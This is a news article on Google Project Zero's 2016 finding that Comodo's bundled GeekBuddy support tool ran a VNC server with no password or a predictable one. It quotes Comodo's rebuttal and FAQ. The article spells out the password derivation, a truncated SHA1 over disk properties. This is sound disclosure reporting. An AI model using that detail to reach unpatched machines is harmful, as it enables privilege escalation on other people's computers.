Warning: Comodo Antivirus included insecure remote tech support tool
A researcher from Google Project Zero discovered a serious security issue with the technical support tools supplied with Comodo software products. Tavis Ormandy found that Comodo Antivirus, Comodo Firewall, and Comodo Internet Security all included a bundled VNC server with either no password protection, or a very weak password.
GeekBuddy is a remote desktop tool used by support staff to troubleshoot customer problems, but it also serves as a backdoor that allows for near-unrestricted access to users' computers. The tool installs with full admin rights, meaning that an attacker could very easily gain complete control of a remote computer.
Older versions of GeekBuddy were installed with no password set, making it possible for anyone to remotely connect to a computer using nothing more than its IP address and a port number. This issue was addressed, but Ormandy found that the password used in subsequent versions is so easily cracked that it offers virtually no protection. He says:
The password is simply the first 8 characters of SHA1 (Disk.Caption+Disk.Signature+Disk.SerialNumber+Disk.TotalTracks)
Having been in communication with Comodo over the issue, Ormandy decided to go public:
Comodo Internet Security installs a VNC server with predictable password by default. https://t.co/HQXVeKgMLT ¯_(ツ)_/¯
— Tavis Ormandy (@taviso) February 18, 2016
Comodo has now addressed the problem -- so make sure your software is up to date -- and Softpedia reports that the company has responded to the revelations:
Comodo has come out to clarify that only its support staff can connect to GeekBuddy, through special company relay servers, meaning remote attackers could not employ this flaw. On the other hand, malware that is already present on the system could use it to escalate its privileges and gain more intrusive capabilities.
Comodo has refuted the claims, saying that it "makes no technical sense":
Recently, it was reported by Google Security that there might be a small local vulnerability in Comodo GeekBuddy that allowed a local attacker to gain another locally logged-on user’s privilege. Here is the link from Google’s Project 0. https://code.google.com/p/google-security-research/issues/detail?id=703
The minor potential vulnerability was fixed and addressed back on February 10, prior to it being made public by Google Security.
Unfortunately, in some posts and reports, it has been erroneously stated that an attacker could somehow gain access to a user’s PC through Comodo GeekBuddy and a logged in user.
We spoke with Comodo Senior Vice President of Engineering Egemen Tas on this issue.
“This makes no technical sense. It is not reasonable to expect a remote attacker to connect to your PC with GeekBuddy. First and foremost, GeekBuddy does NOT open any ports and does not accept any incoming connections. Only Comodo technical support, during specific support sessions, can connect and this connection is established through Comodo relay servers, not from a local network or from the internet.”
Mr. Tas continued:
“Second, the vulnerability reported has nothing to do with accessing a VNC server remotely, but using a VNC server to obtain another user’s privilege level — if you have access to the same PC and know the details of the password generation algorithm.”
“Third, the issue cannot be exploited remotely. The attacker has to gain local access to the PC first in order to try and do anything – and the password would need to be predictable only by skilled attackers”
“And lastly, the minor vulnerability has been fixed and addressed back on February 10.”
In summary – all software goes through patch and fixes and this minor issue has already been fixed in GeekBuddy 4.25.380415.167(released on February 10th) and shared with customers.
At Comodo, we always strive to protect our users, and to assist you here are some frequently asked questions on the issue. Customers can feel free to contact GeekBuddy directly at[email protected] or 866-272-9804.
What is the issue?
GeekBuddy uses a modified version of VNC to allow Comodo technicians remote access the PCs during support sessions. In order to use VNC, a local user needs to have a password. In GeekBuddy we automatically generate the password per computer to prevent any local user access to this service.
Which GeekBuddy or CIS versions are affected?
The reported issue does not affect Comodo Internet Security (CIS). It is specifically related to GeekBuddy versions prior to Build 167. We released the hotfix on the 10th of February.
Does GeekBuddy allow remote access by anyone?
No. GeekBuddy is used for remote technical support by Comodo engineers only. It is not technically possible for anyone to connect to your PC. It does NOT open any ports at all. This issue does not allow any remote attacker to obtain any privileges. It requires local access and specific conditions.